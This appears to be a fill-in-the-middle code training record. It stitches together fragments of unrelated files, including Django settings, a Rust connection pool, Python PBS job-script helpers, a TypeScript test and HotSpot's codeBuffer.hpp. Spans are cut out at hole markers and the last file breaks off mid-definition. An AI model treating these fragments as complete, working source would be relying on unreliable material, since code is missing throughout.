# 'django.contrib.sessions.middleware.SessionMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
'django.middleware.locale.LocaleMiddleware',
# 'django.contrib.auth.middleware.AuthenticationMiddleware',
# 'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'ask_undrgz.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
ROOT_PATH + '/templates',
)
INSTALLED_APPS = (
# 'django.contrib.auth',
'django.contrib.contenttypes',
# 'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
# Uncomment the next line to enable the admin:
# 'django.contrib.admin',
'ask_undrgz.question',
)<|fim▁end|> | |
<|file_name|>pool.rs<|end_file_name|><|fim▁begin|>use r2d2::Pool;
use r2d2_postgres::PostgresConnectionManager;
use r2d2::Config;
use postgres::SslMode;
use config::DbConfig;
use database::{Database, DatabaseDDL, DatabaseDev};
use platform::Postgres;
#[cfg(feature = "sqlite")]
use platform::Sqlite;
#[cfg(feature = "mysql")]
use platform::Mysql;
#[cfg(feature = "mysql")]
use mysql::conn::pool::MyPool;
#[cfg(feature = "mysql")]
use mysql::conn::MyOpts;
use database::DbError;
#[cfg(feature = "sqlite")]
use r2d2_sqlite::SqliteConnectionManager;
/// The SQL builder for each supported database platform.
///
/// Variants are feature-gated so only back ends compiled in are
/// available; `Oracle` is declared but has no implementation yet.
pub enum Platform {
    Postgres(Postgres),
    #[cfg(feature = "sqlite")]
    Sqlite(Sqlite),
    Oracle,
    #[cfg(feature = "mysql")]
    Mysql(Mysql),
}
impl Platform {
    /// Borrow the platform as a generic `Database` trait object.
    ///
    /// Panics via `unimplemented!` for variants with no implementation
    /// (e.g. `Oracle`).
    pub fn as_ref(&self) -> &Database {
        match *self {
            Platform::Postgres(ref pg) => pg,
            #[cfg(feature = "sqlite")]
            Platform::Sqlite(ref lite) => lite,
            #[cfg(feature = "mysql")]
            Platform::Mysql(ref my) => my,
            _ => unimplemented!(),
        }
    }

    /// Borrow the platform as a `DatabaseDDL` trait object for schema
    /// manipulation. Panics for unsupported variants.
    pub fn as_ddl(&self) -> &DatabaseDDL {
        match *self {
            Platform::Postgres(ref pg) => pg,
            #[cfg(feature = "sqlite")]
            Platform::Sqlite(ref lite) => lite,
            #[cfg(feature = "mysql")]
            Platform::Mysql(ref my) => my,
            _ => unimplemented!(),
        }
    }

    /// Borrow the platform as a `DatabaseDev` trait object.
    ///
    /// Note: MySQL is intentionally not matched here, so it panics too.
    pub fn as_dev(&self) -> &DatabaseDev {
        match *self {
            Platform::Postgres(ref pg) => pg,
            #[cfg(feature = "sqlite")]
            Platform::Sqlite(ref lite) => lite,
            _ => unimplemented!(),
        }
    }
}
/// Connection-pool wrapper per platform: Postgres and Sqlite use an
/// r2d2 connection manager, while MySQL ships its own pooling
/// (`MyPool`); `Oracle` is a placeholder with no pool.
pub enum ManagedPool {
    Postgres(Pool<PostgresConnectionManager>),
    #[cfg(feature = "sqlite")]
    Sqlite(Pool<SqliteConnectionManager>),
    Oracle,
    #[cfg(feature = "mysql")]
    Mysql(Option<MyPool>),
}
impl ManagedPool {
/// initialize the pool
pub fn init(url: &str, pool_size: usize) -> Result<Self, DbError> {
let config = DbConfig::from_url(url);
match config {
Some(config) => {
let platform: &str = &config.platform;
match platform {
"postgres" => {
let manager = try!(PostgresConnectionManager::new(url, SslMode::None));
println!("Creating a connection with a pool size of {}", pool_size);
let config = Config::builder().pool_size(pool_size as u32).build();
let pool = try!(Pool::new(config, manager));
Ok(ManagedPool::Postgres(pool))
}
#[cfg(feature = "sqlite")]
"sqlite" => {
let manager = try!(SqliteConnectionManager::new(&config.database));
let config = Config::builder().pool_size(pool_size as u32).build();
let pool = try!(Pool::new(config, manager));
Ok(ManagedPool::Sqlite(pool))
}
#[cfg(feature = "mysql")]
"mysql" => {
let opts = MyOpts {
user: config.username,
pass: config.password,
db_name: Some(config.database),
tcp_addr: Some(config.host.unwrap().to_string()),
tcp_port: config.port.unwrap_or(3306),
..Default::default()
};
let pool = try!(MyPool::new_manual(0, pool_size, opts));
Ok(ManagedPool::Mysql(Some(pool)))
}
_ => unimplemented!(),
}
}
None => {<|fim▁hole|> }
}
    /// Check out a single connection from the managed pool and wrap it
    /// in the matching `Platform` SQL builder.
    ///
    /// Returns a `DbError` when the pool cannot hand out a connection
    /// or when the back end is not supported.
    pub fn connect(&self) -> Result<Platform, DbError> {
        match *self {
            ManagedPool::Postgres(ref pool) => {
                match pool.get() {
                    Ok(conn) => {
                        let pg = Postgres::with_pooled_connection(conn);
                        Ok(Platform::Postgres(pg))
                    }
                    Err(e) => {
                        Err(DbError::new(&format!("Unable to connect due to {}", e)))
                    }
                }
            }
            #[cfg(feature = "sqlite")]
            ManagedPool::Sqlite(ref pool) => {
                match pool.get() {
                    Ok(conn) => {
                        let lite = Sqlite::with_pooled_connection(conn);
                        Ok(Platform::Sqlite(lite))
                    }
                    Err(e) => {
                        Err(DbError::new(&format!("Unable to connect due to {}", e)))
                    }
                }
            }
            #[cfg(feature = "mysql")]
            ManagedPool::Mysql(ref pool) => {
                // Presumably MyPool is internally reference-counted, so this
                // clone shares the pool rather than duplicating it (Arc
                // clone semantics) — TODO confirm against the mysql crate.
                let my = Mysql::with_pooled_connection(pool.clone().unwrap());
                Ok(Platform::Mysql(my))
            }
            _ => Err(DbError::new("Any other database is not yet supported")),
        }
    }
}<|fim▁end|> | println!("Unable to parse url");
Err(DbError::new("Error parsing url"))
} |
<|file_name|>exceptions.py<|end_file_name|><|fim▁begin|>class DestinationNotFoundException(Exception):
pass
class InvalidDateFormat(Exception):<|fim▁hole|><|fim▁end|> | pass |
<|file_name|>Top10Controller.js<|end_file_name|><|fim▁begin|>/*global GLOBE, Em */
GLOBE.Top10Controller = Em.ArrayController.extend({
needs: ['application'],
relays: [],<|fim▁hole|>
actions: {
showRelayDetail: function(fingerprint) {
this.transitionToRoute('relayDetail', fingerprint);
}
}
});<|fim▁end|> | |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>__all__ = ["sqlite_dump", "sqlite_merge"]
from random import Random
import math
def random_expectations(depth=0, breadth=3, low=1, high=10, random=Random()):
"""
Generate depth x breadth array of random numbers where each row sums to
high, with a minimum of low.
"""
result = []
if depth == 0:
initial = high + 1
for i in range(breadth - 1):<|fim▁hole|> n = random.randint(low, initial - (low * (breadth - i)))
initial -= n
result.append(n)
result.append(initial - low)
random.shuffle(result)
else:
result = [random_expectations(depth - 1, breadth, low, high, random) for x in range(breadth)]
return result
def rescale(new_low, new_high, low, diff, x):
    """Linearly map ``x`` from the range ``[low, low + diff]`` onto
    ``[new_low, new_high]``.

    ``diff`` is the *width* of the source range, not its upper bound.
    """
    span = new_high - new_low
    offset = x - low
    value = span * offset
    value /= diff
    return value + new_low
def weighted_random_choice(choices, weights, random=Random()):
    """Pick one element of ``choices`` with probability proportional to
    its integer-truncated weight.

    Weights are truncated with ``int``, so a weight below 1 removes the
    element entirely.  Note the default RNG instance is created once at
    definition time and shared by all callers that omit ``random``.
    """
    pool = []
    for value, count in zip(choices, weights):
        pool.extend([value] * int(count))
    return random.choice(pool)
def multinomial(probabilities, draws=1, random=Random()):
    """Draw ``draws`` samples from a multinomial distribution.

    Returns a list of counts, one per entry of ``probabilities``.  If the
    probabilities sum to less than one, a draw falling past the total is
    credited to the last category (historical behavior, kept as-is).
    """
    def pick_category():
        threshold = random.random()
        cumulative = 0.
        for index in range(len(probabilities)):
            cumulative += probabilities[index]
            if threshold < cumulative:
                return index
        return index  # fell through: credit the final category

    counts = [0] * len(probabilities)
    for _ in range(draws):
        counts[pick_category()] += 1
    return counts
def logistic_random(loc, scale, random=Random()):
    """Draw one sample from a logistic(loc, scale) distribution.

    Uses inverse-CDF sampling on a uniform variate from ``random``.
    """
    u = random.random()
    return loc + scale * math.log(u / (1 - u))
def shuffled(target, random=Random()):
    """Return a shuffled copy of ``target``; the argument itself is
    left untouched."""
    result = target[:]
    random.shuffle(result)
    return result
def make_pbs_script(kwargs, hours=60, mins=0, ppn=16, script_name=None):
    """Generate a PBS array-job run script to be submitted.

    Parameters
    ----------
    kwargs : namespace whose ``kwargs[0]`` is the path of the first
        pickled-argument file and whose ``file_name`` is the result-file
        prefix (assumed attributes — confirm against the caller).
    hours, mins : walltime requested from the scheduler.
    ppn : processors per node for the single-node job.
    script_name : when given, the generated script removes itself after
        the final array task has run.

    Returns
    -------
    tuple
        ``(script_text, count)`` where ``count`` is the number of
        matching argument files (i.e. the size of the job array).
    """
    import sys
    from disclosuregame.Util.sqlite_merge import list_matching
    from os.path import split

    # One array task per argument file matching the supplied pattern.
    args_dir, name = split(kwargs.kwargs[0])
    kwargs_files = list_matching(args_dir, name)
    count = len(kwargs_files)

    # Reuse this process's own command line, substituting the PBS array
    # index for wildcards and prefixing result files with the task id.
    args = " ".join(sys.argv[1:])
    args = args.replace("*", "${PBS_ARRAYID}")
    args = args.replace(" %s " % kwargs.file_name, " ${PBS_ARRAYID}_%s " % kwargs.file_name)
    if kwargs.file_name == "":
        args += " -f ${PBS_ARRAYID}"
    interpreter = sys.executable
    run_script = ["#!/bin/bash -vx",
                  "#PBS -l walltime=%d:%d:00" % (hours, mins),
                  "#PBS -l nodes=1:ppn=%d" % ppn,
                  "module load python"]
    # Doesn't work on multiple nodes, sadly
    run_call = "%s -m disclosuregame.run %s" % (interpreter, args)
    run_script.append(run_call)
    # Cleanup after all jobs have run.
    if script_name is not None:
        # BUGFIX: bash's '[' is a command whose arguments must be
        # whitespace-separated; the previous "if [$PBS_ARRAYID -eq N]"
        # produced "[N: command not found" so the cleanup never ran.
        run_script.append("if [ $PBS_ARRAYID -eq %d ]" % count)
        run_script.append("then")
        run_script.append("\trm %s" % script_name)
        run_script.append("fi")
    return '\n'.join(run_script), count
# ${python} Run.py -R 100 -s ${sig} -r ${resp} --pickled-arguments ../experiment_args/sensitivity_${PBS_ARRAYID}.args -f ${PBS_ARRAYID}_sensitivity -i 1000 -d ${dir} -g ${game}<|fim▁end|> | |
<|file_name|>abstractPropertyInConstructor.ts<|end_file_name|><|fim▁begin|>abstract class AbstractClass {
constructor(str: string, other: AbstractClass) {
this.method(parseInt(str));
let val = this.prop.toLowerCase();
if (!str) {
this.prop = "Hello World";
}
this.cb(str);
// OK, reference is inside function
const innerFunction = () => {
return this.prop;
}
// OK, references are to another instance
other.cb(other.prop);
}
abstract prop: string;
abstract cb: (s: string) => void;
abstract method(num: number): void;
other = this.prop;
fn = () => this.prop;
method2() {
this.prop = this.prop + "!";
}
}
abstract class DerivedAbstractClass extends AbstractClass {
cb = (s: string) => {};
<|fim▁hole|> constructor(str: string, other: AbstractClass, yetAnother: DerivedAbstractClass) {
super(str, other);
// there is no implementation of 'prop' in any base class
this.cb(this.prop.toLowerCase());
this.method(1);
// OK, references are to another instance
other.cb(other.prop);
yetAnother.cb(yetAnother.prop);
}
}
class Implementation extends DerivedAbstractClass {
prop = "";
cb = (s: string) => {};
constructor(str: string, other: AbstractClass, yetAnother: DerivedAbstractClass) {
super(str, other, yetAnother);
this.cb(this.prop);
}
method(n: number) {
this.cb(this.prop + n);
}
}
class User {
constructor(a: AbstractClass) {
a.prop;
a.cb("hi");
a.method(12);
a.method2();
}
}<|fim▁end|> | |
<|file_name|>codeBuffer.hpp<|end_file_name|><|fim▁begin|>/*
* Copyright (c) 1997, 2013, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*
*/
#ifndef SHARE_VM_ASM_CODEBUFFER_HPP
#define SHARE_VM_ASM_CODEBUFFER_HPP
#include "code/oopRecorder.hpp"
#include "code/relocInfo.hpp"
class CodeStrings;
class PhaseCFG;
class Compile;
class BufferBlob;
class CodeBuffer;
class Label;
// Table of well-known offsets within a generated code blob (entry
// points and exception/deopt handler locations), indexed by Entries.
class CodeOffsets: public StackObj {
 public:
  enum Entries { Entry,
                 Verified_Entry,
                 Frame_Complete, // Offset in the code where the frame setup is (for forte stackwalks) is complete
                 OSR_Entry,
                 Dtrace_trap = OSR_Entry, // dtrace probes can never have an OSR entry so reuse it
                 Exceptions,     // Offset where exception handler lives
                 Deopt,          // Offset where deopt handler lives
                 DeoptMH,        // Offset where MethodHandle deopt handler lives
                 UnwindHandler,  // Offset to default unwind handler
                 max_Entries };

  // special value to note codeBlobs where profile (forte) stack walking is
  // always dangerous and suspect.
  enum { frame_never_safe = -1 };

 private:
  int _values[max_Entries];

 public:
  // Entry points default to offset 0; handler offsets to -1 (absent);
  // frame completion stays frame_never_safe until explicitly recorded.
  CodeOffsets() {
    _values[Entry         ] = 0;
    _values[Verified_Entry] = 0;
    _values[Frame_Complete] = frame_never_safe;
    _values[OSR_Entry     ] = 0;
    _values[Exceptions    ] = -1;
    _values[Deopt         ] = -1;
    _values[DeoptMH       ] = -1;
    _values[UnwindHandler ] = -1;
  }

  int value(Entries e) { return _values[e]; }          // read an offset
  void set_value(Entries e, int val) { _values[e] = val; } // record an offset
};
// This class represents a stream of code and associated relocations.
// There are a few in each CodeBuffer.
// They are filled concurrently, and concatenated at the end.
class CodeSection VALUE_OBJ_CLASS_SPEC {
friend class CodeBuffer;
public:
typedef int csize_t; // code size type; would be size_t except for history
private:
address _start; // first byte of contents (instructions)
address _mark; // user mark, usually an instruction beginning
address _end; // current end address
address _limit; // last possible (allocated) end address
relocInfo* _locs_start; // first byte of relocation information
relocInfo* _locs_end; // first byte after relocation information
relocInfo* _locs_limit; // first byte after relocation information buf
address _locs_point; // last relocated position (grows upward)
bool _locs_own; // did I allocate the locs myself?
bool _frozen; // no more expansion of this section
char _index; // my section number (SECT_INST, etc.)
CodeBuffer* _outer; // enclosing CodeBuffer
// (Note: _locs_point used to be called _last_reloc_offset.)
CodeSection() {
_start = NULL;
_mark = NULL;
_end = NULL;
_limit = NULL;
_locs_start = NULL;
_locs_end = NULL;
_locs_limit = NULL;
_locs_point = NULL;
_locs_own = false;
_frozen = false;
debug_only(_index = (char)-1);
debug_only(_outer = (CodeBuffer*)badAddress);
}
void initialize_outer(CodeBuffer* outer, int index) {
_outer = outer;
_index = index;
}
void initialize(address start, csize_t size = 0) {
assert(_start == NULL, "only one init step, please");
_start = start;
_mark = NULL;
_end = start;
_limit = start + size;
_locs_point = start;
}
void initialize_locs(int locs_capacity);
void expand_locs(int new_capacity);
void initialize_locs_from(const CodeSection* source_cs);
// helper for CodeBuffer::expand()
void take_over_code_from(CodeSection* cs) {
_start = cs->_start;
_mark = cs->_mark;
_end = cs->_end;
_limit = cs->_limit;
_locs_point = cs->_locs_point;
}
public:
address start() const { return _start; }
address mark() const { return _mark; }
address end() const { return _end; }
address limit() const { return _limit; }
csize_t size() const { return (csize_t)(_end - _start); }
csize_t mark_off() const { assert(_mark != NULL, "not an offset");
return (csize_t)(_mark - _start); }
csize_t capacity() const { return (csize_t)(_limit - _start); }
csize_t remaining() const { return (csize_t)(_limit - _end); }
relocInfo* locs_start() const { return _locs_start; }
relocInfo* locs_end() const { return _locs_end; }
int locs_count() const { return (int)(_locs_end - _locs_start); }
relocInfo* locs_limit() const { return _locs_limit; }
address locs_point() const { return _locs_point; }
csize_t locs_point_off() const{ return (csize_t)(_locs_point - _start); }
csize_t locs_capacity() const { return (csize_t)(_locs_limit - _locs_start); }
csize_t locs_remaining()const { return (csize_t)(_locs_limit - _locs_end); }
int index() const { return _index; }
bool is_allocated() const { return _start != NULL; }
bool is_empty() const { return _start == _end; }
bool is_frozen() const { return _frozen; }
bool has_locs() const { return _locs_end != NULL; }
CodeBuffer* outer() const { return _outer; }
// is a given address in this section? (2nd version is end-inclusive)
bool contains(address pc) const { return pc >= _start && pc < _end; }
bool contains2(address pc) const { return pc >= _start && pc <= _end; }
bool allocates(address pc) const { return pc >= _start && pc < _limit; }
bool allocates2(address pc) const { return pc >= _start && pc <= _limit; }
void set_end(address pc) { assert(allocates2(pc), err_msg("not in CodeBuffer memory: " PTR_FORMAT " <= " PTR_FORMAT " <= " PTR_FORMAT, _start, pc, _limit)); _end = pc; }
void set_mark(address pc) { assert(contains2(pc), "not in codeBuffer");
_mark = pc; }
void set_mark_off(int offset) { assert(contains2(offset+_start),"not in codeBuffer");
_mark = offset + _start; }
void set_mark() { _mark = _end; }
void clear_mark() { _mark = NULL; }
void set_locs_end(relocInfo* p) {
assert(p <= locs_limit(), "locs data fits in allocated buffer");
_locs_end = p;
}
void set_locs_point(address pc) {
assert(pc >= locs_point(), "relocation addr may not decrease");
assert(allocates2(pc), "relocation addr must be in this section");
_locs_point = pc;
}
// Code emission
void emit_int8 ( int8_t x) { *((int8_t*) end()) = x; set_end(end() + sizeof(int8_t)); }
void emit_int16( int16_t x) { *((int16_t*) end()) = x; set_end(end() + sizeof(int16_t)); }
void emit_int32( int32_t x) { *((int32_t*) end()) = x; set_end(end() + sizeof(int32_t)); }
void emit_int64( int64_t x) { *((int64_t*) end()) = x; set_end(end() + sizeof(int64_t)); }
void emit_float( jfloat x) { *((jfloat*) end()) = x; set_end(end() + sizeof(jfloat)); }
void emit_double(jdouble x) { *((jdouble*) end()) = x; set_end(end() + sizeof(jdouble)); }
void emit_address(address x) { *((address*) end()) = x; set_end(end() + sizeof(address)); }
// Share a scratch buffer for relocinfo. (Hacky; saves a resource allocation.)
void initialize_shared_locs(relocInfo* buf, int length);
// Manage labels and their addresses.
address target(Label& L, address branch_pc);
// Emit a relocation.
void relocate(address at, RelocationHolder const& rspec, int format = 0);
void relocate(address at, relocInfo::relocType rtype, int format = 0) {
if (rtype != relocInfo::none)
relocate(at, Relocation::spec_simple(rtype), format);
}
// alignment requirement for starting offset
// Requirements are that the instruction area and the
// stubs area must start on CodeEntryAlignment, and
// the ctable on sizeof(jdouble)
int alignment() const { return MAX2((int)sizeof(jdouble), (int)CodeEntryAlignment); }
// Slop between sections, used only when allocating temporary BufferBlob buffers.
static csize_t end_slop() { return MAX2((int)sizeof(jdouble), (int)CodeEntryAlignment); }
csize_t align_at_start(csize_t off) const { return (csize_t) align_size_up(off, alignment()); }
<|fim▁hole|> // Mark a section frozen. Assign its remaining space to
// the following section. It will never expand after this point.
inline void freeze(); // { _outer->freeze_section(this); }
// Ensure there's enough space left in the current section.
// Return true if there was an expansion.
bool maybe_expand_to_ensure_remaining(csize_t amount);
#ifndef PRODUCT
void decode();
void dump();
void print(const char* name);
#endif //PRODUCT
};
class CodeString;
class CodeStrings VALUE_OBJ_CLASS_SPEC {
private:
#ifndef PRODUCT
CodeString* _strings;
#endif
CodeString* find(intptr_t offset) const;
CodeString* find_last(intptr_t offset) const;
public:
CodeStrings() {
#ifndef PRODUCT
_strings = NULL;
#endif
}
const char* add_string(const char * string) PRODUCT_RETURN_(return NULL;);
void add_comment(intptr_t offset, const char * comment) PRODUCT_RETURN;
void print_block_comment(outputStream* stream, intptr_t offset) const PRODUCT_RETURN;
void assign(CodeStrings& other) PRODUCT_RETURN;
void free() PRODUCT_RETURN;
};
// A CodeBuffer describes a memory space into which assembly
// code is generated. This memory space usually occupies the
// interior of a single BufferBlob, but in some cases it may be
// an arbitrary span of memory, even outside the code cache.
//
// A code buffer comes in two variants:
//
// (1) A CodeBuffer referring to an already allocated piece of memory:
// This is used to direct 'static' code generation (e.g. for interpreter
// or stubroutine generation, etc.). This code comes with NO relocation
// information.
//
// (2) A CodeBuffer referring to a piece of memory allocated when the
// CodeBuffer is allocated. This is used for nmethod generation.
//
// The memory can be divided up into several parts called sections.
// Each section independently accumulates code (or data) an relocations.
// Sections can grow (at the expense of a reallocation of the BufferBlob
// and recopying of all active sections). When the buffered code is finally
// written to an nmethod (or other CodeBlob), the contents (code, data,
// and relocations) of the sections are padded to an alignment and concatenated.
// Instructions and data in one section can contain relocatable references to
// addresses in a sibling section.
class CodeBuffer: public StackObj {
friend class CodeSection;
private:
// CodeBuffers must be allocated on the stack except for a single
// special case during expansion which is handled internally. This
// is done to guarantee proper cleanup of resources.
void* operator new(size_t size) throw() { return ResourceObj::operator new(size); }
void operator delete(void* p) { ShouldNotCallThis(); }
public:
typedef int csize_t; // code size type; would be size_t except for history
enum {
// Here is the list of all possible sections. The order reflects
// the final layout.
SECT_FIRST = 0,
SECT_CONSTS = SECT_FIRST, // Non-instruction data: Floats, jump tables, etc.
SECT_INSTS, // Executable instructions.
SECT_STUBS, // Outbound trampolines for supporting call sites.
SECT_LIMIT, SECT_NONE = -1
};
private:
enum {
sect_bits = 2, // assert (SECT_LIMIT <= (1<<sect_bits))
sect_mask = (1<<sect_bits)-1
};
const char* _name;
CodeSection _consts; // constants, jump tables
CodeSection _insts; // instructions (the main section)
CodeSection _stubs; // stubs (call site support), deopt, exception handling
CodeBuffer* _before_expand; // dead buffer, from before the last expansion
BufferBlob* _blob; // optional buffer in CodeCache for generated code
address _total_start; // first address of combined memory buffer
csize_t _total_size; // size in bytes of combined memory buffer
OopRecorder* _oop_recorder;
CodeStrings _strings;
OopRecorder _default_oop_recorder; // override with initialize_oop_recorder
Arena* _overflow_arena;
address _decode_begin; // start address for decode
address decode_begin();
void initialize_misc(const char * name) {
// all pointers other than code_start/end and those inside the sections
assert(name != NULL, "must have a name");
_name = name;
_before_expand = NULL;
_blob = NULL;
_oop_recorder = NULL;
_decode_begin = NULL;
_overflow_arena = NULL;
}
void initialize(address code_start, csize_t code_size) {
_consts.initialize_outer(this, SECT_CONSTS);
_insts.initialize_outer(this, SECT_INSTS);
_stubs.initialize_outer(this, SECT_STUBS);
_total_start = code_start;
_total_size = code_size;
// Initialize the main section:
_insts.initialize(code_start, code_size);
assert(!_stubs.is_allocated(), "no garbage here");
assert(!_consts.is_allocated(), "no garbage here");
_oop_recorder = &_default_oop_recorder;
}
void initialize_section_size(CodeSection* cs, csize_t size);
void freeze_section(CodeSection* cs);
// helper for CodeBuffer::expand()
void take_over_code_from(CodeBuffer* cs);
// ensure sections are disjoint, ordered, and contained in the blob
void verify_section_allocation();
// copies combined relocations to the blob, returns bytes copied
// (if target is null, it is a dry run only, just for sizing)
csize_t copy_relocations_to(CodeBlob* blob) const;
// copies combined code to the blob (assumes relocs are already in there)
void copy_code_to(CodeBlob* blob);
// moves code sections to new buffer (assumes relocs are already in there)
void relocate_code_to(CodeBuffer* cb) const;
// set up a model of the final layout of my contents
void compute_final_layout(CodeBuffer* dest) const;
// Expand the given section so at least 'amount' is remaining.
// Creates a new, larger BufferBlob, and rewrites the code & relocs.
void expand(CodeSection* which_cs, csize_t amount);
// Helper for expand.
csize_t figure_expanded_capacities(CodeSection* which_cs, csize_t amount, csize_t* new_capacity);
public:
// (1) code buffer referring to pre-allocated instruction memory
CodeBuffer(address code_start, csize_t code_size) {
assert(code_start != NULL, "sanity");
initialize_misc("static buffer");
initialize(code_start, code_size);
verify_section_allocation();
}
// (2) CodeBuffer referring to pre-allocated CodeBlob.
CodeBuffer(CodeBlob* blob);
// (3) code buffer allocating codeBlob memory for code & relocation
// info but with lazy initialization. The name must be something
// informative.
CodeBuffer(const char* name) {
initialize_misc(name);
}
// (4) code buffer allocating codeBlob memory for code & relocation
// info. The name must be something informative and code_size must
// include both code and stubs sizes.
CodeBuffer(const char* name, csize_t code_size, csize_t locs_size) {
initialize_misc(name);
initialize(code_size, locs_size);
}
~CodeBuffer();
// Initialize a CodeBuffer constructed using constructor 3. Using
// constructor 4 is equivalent to calling constructor 3 and then
// calling this method. It's been factored out for convenience of
// construction.
void initialize(csize_t code_size, csize_t locs_size);
CodeSection* consts() { return &_consts; }
CodeSection* insts() { return &_insts; }
CodeSection* stubs() { return &_stubs; }
// present sections in order; return NULL at end; consts is #0, etc.
CodeSection* code_section(int n) {
// This makes the slightly questionable but portable assumption
// that the various members (_consts, _insts, _stubs, etc.) are
// adjacent in the layout of CodeBuffer.
CodeSection* cs = &_consts + n;
assert(cs->index() == n || !cs->is_allocated(), "sanity");
return cs;
}
const CodeSection* code_section(int n) const { // yucky const stuff
return ((CodeBuffer*)this)->code_section(n);
}
static const char* code_section_name(int n);
int section_index_of(address addr) const;
bool contains(address addr) const {
// handy for debugging
return section_index_of(addr) > SECT_NONE;
}
// A stable mapping between 'locators' (small ints) and addresses.
static int locator_pos(int locator) { return locator >> sect_bits; }
static int locator_sect(int locator) { return locator & sect_mask; }
static int locator(int pos, int sect) { return (pos << sect_bits) | sect; }
int locator(address addr) const;
address locator_address(int locator) const;
// Heuristic for pre-packing the taken/not-taken bit of a predicted branch.
bool is_backward_branch(Label& L);
// Properties
const char* name() const { return _name; }
CodeBuffer* before_expand() const { return _before_expand; }
BufferBlob* blob() const { return _blob; }
void set_blob(BufferBlob* blob);
void free_blob(); // Free the blob, if we own one.
// Properties relative to the insts section:
address insts_begin() const { return _insts.start(); }
address insts_end() const { return _insts.end(); }
void set_insts_end(address end) { _insts.set_end(end); }
address insts_limit() const { return _insts.limit(); }
address insts_mark() const { return _insts.mark(); }
void set_insts_mark() { _insts.set_mark(); }
void clear_insts_mark() { _insts.clear_mark(); }
// is there anything in the buffer other than the current section?
bool is_pure() const { return insts_size() == total_content_size(); }
// size in bytes of output so far in the insts sections
csize_t insts_size() const { return _insts.size(); }
// same as insts_size(), except that it asserts there is no non-code here
csize_t pure_insts_size() const { assert(is_pure(), "no non-code");
return insts_size(); }
// capacity in bytes of the insts sections
csize_t insts_capacity() const { return _insts.capacity(); }
// number of bytes remaining in the insts section
csize_t insts_remaining() const { return _insts.remaining(); }
// is a given address in the insts section? (2nd version is end-inclusive)
bool insts_contains(address pc) const { return _insts.contains(pc); }
bool insts_contains2(address pc) const { return _insts.contains2(pc); }
// Record any extra oops required to keep embedded metadata alive
void finalize_oop_references(methodHandle method);
// Allocated size in all sections, when aligned and concatenated
// (this is the eventual state of the content in its final
// CodeBlob).
csize_t total_content_size() const;
// Combined offset (relative to start of first section) of given
// section, as eventually found in the final CodeBlob.
csize_t total_offset_of(CodeSection* cs) const;
// allocated size of all relocation data, including index, rounded up
csize_t total_relocation_size() const;
// allocated size of any and all recorded oops
csize_t total_oop_size() const {
OopRecorder* recorder = oop_recorder();
return (recorder == NULL)? 0: recorder->oop_size();
}
// allocated size of any and all recorded metadata
csize_t total_metadata_size() const {
OopRecorder* recorder = oop_recorder();
return (recorder == NULL)? 0: recorder->metadata_size();
}
// Configuration functions, called immediately after the CB is constructed.
// The section sizes are subtracted from the original insts section.
// Note: Call them in reverse section order, because each steals from insts.
void initialize_consts_size(csize_t size) { initialize_section_size(&_consts, size); }
void initialize_stubs_size(csize_t size) { initialize_section_size(&_stubs, size); }
// Override default oop recorder.
void initialize_oop_recorder(OopRecorder* r);
OopRecorder* oop_recorder() const { return _oop_recorder; }
CodeStrings& strings() { return _strings; }
// Code generation
void relocate(address at, RelocationHolder const& rspec, int format = 0) {
_insts.relocate(at, rspec, format);
}
void relocate(address at, relocInfo::relocType rtype, int format = 0) {
_insts.relocate(at, rtype, format);
}
// Management of overflow storage for binding of Labels.
GrowableArray<int>* create_patch_overflow();
// NMethod generation
void copy_code_and_locs_to(CodeBlob* blob) {
assert(blob != NULL, "sane");
copy_relocations_to(blob);
copy_code_to(blob);
}
void copy_values_to(nmethod* nm) {
if (!oop_recorder()->is_unused()) {
oop_recorder()->copy_values_to(nm);
}
}
// Transform an address from the code in this code buffer to a specified code buffer
address transform_address(const CodeBuffer &cb, address addr) const;
void block_comment(intptr_t offset, const char * comment) PRODUCT_RETURN;
const char* code_string(const char* str) PRODUCT_RETURN_(return NULL;);
// Log a little info about section usage in the CodeBuffer
void log_section_sizes(const char* name);
#ifndef PRODUCT
public:
// Printing / Decoding
// decodes from decode_begin() to code_end() and sets decode_begin to end
void decode();
void decode_all(); // decodes all the code
void skip_decode(); // sets decode_begin to code_end();
void print();
#endif
// The following header contains architecture-specific implementations
#ifdef TARGET_ARCH_x86
# include "codeBuffer_x86.hpp"
#endif
#ifdef TARGET_ARCH_sparc
# include "codeBuffer_sparc.hpp"
#endif
#ifdef TARGET_ARCH_zero
# include "codeBuffer_zero.hpp"
#endif
#ifdef TARGET_ARCH_arm
# include "codeBuffer_arm.hpp"
#endif
#ifdef TARGET_ARCH_ppc
# include "codeBuffer_ppc.hpp"
#endif
};
inline void CodeSection::freeze() {
_outer->freeze_section(this);
}
inline bool CodeSection::maybe_expand_to_ensure_remaining(csize_t amount) {
if (remaining() < amount) { _outer->expand(this, amount); return true; }
return false;
}
#endif // SHARE_VM_ASM_CODEBUFFER_HPP<|fim▁end|> | |
<|file_name|>context_provider.rs<|end_file_name|><|fim▁begin|>use std::{
cell::{Cell, RefCell},
collections::BTreeMap,
rc::Rc,
sync::mpsc,
};
use dces::prelude::*;
use super::WindowAdapter;
use crate::{
event::*,
layout::*,
localization::Localization,
render_object::*,
shell::{ShellRequest, WindowRequest},
utils::Point,
widget_base::*,
};
/// Temporary solution to share dependencies. Will be refactored soon.
#[derive(Clone)]
pub struct ContextProvider {
/// Reference counted cells of render objects.
pub render_objects: Rc<RefCell<BTreeMap<Entity, Box<dyn RenderObject>>>>,
